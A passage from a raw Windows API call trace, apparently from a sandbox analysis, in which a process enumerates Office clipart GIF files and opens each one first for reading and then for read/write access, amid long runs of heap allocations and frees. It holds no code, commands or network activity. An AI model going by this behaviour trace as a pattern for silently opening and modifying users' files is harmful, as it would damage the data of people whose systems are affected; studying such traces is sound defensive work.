Size=0x20) returned 0x883b0 [0100.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0100.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0100.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0100.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0100.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0100.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0100.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0100.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0100.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.821] AreFileApisANSI () returned 1 [0100.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0100.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 69 [0100.822] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b48)) returned 1 [0100.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0100.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0100.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.822] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x33c6, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00164_.GIF", cAlternateFileName="")) returned 1 [0100.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0100.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0100.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0100.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0100.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0100.823] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.823] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.823] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.823] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0100.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.823] AreFileApisANSI () returned 1 [0100.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0100.823] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.823] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.823] AreFileApisANSI () returned 1 [0100.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0100.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 69 [0100.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.823] GetFileType (hFile=0x27c) returned 0x1 [0100.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0100.824] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.824] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.824] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.824] CloseHandle (hObject=0x27c) returned 1 [0100.824] AreFileApisANSI () returned 1 [0100.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a9f0 [0100.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8a9f0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 69 [0100.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.824] GetFileType (hFile=0x27c) returned 0x1 [0100.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0100.825] CloseHandle (hObject=0x27c) returned 1 [0100.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0100.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0100.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0100.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0100.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0100.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0100.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.826] AreFileApisANSI () returned 1 [0100.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0100.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 69 [0100.826] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x33c6)) returned 1 [0100.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0100.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0100.826] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.826] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.826] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2186, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00165_.GIF", cAlternateFileName="")) returned 1 [0100.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0100.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0100.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0100.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0100.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0100.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0100.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.827] AreFileApisANSI () returned 1 [0100.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0100.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.827] AreFileApisANSI () returned 1 [0100.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0100.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft 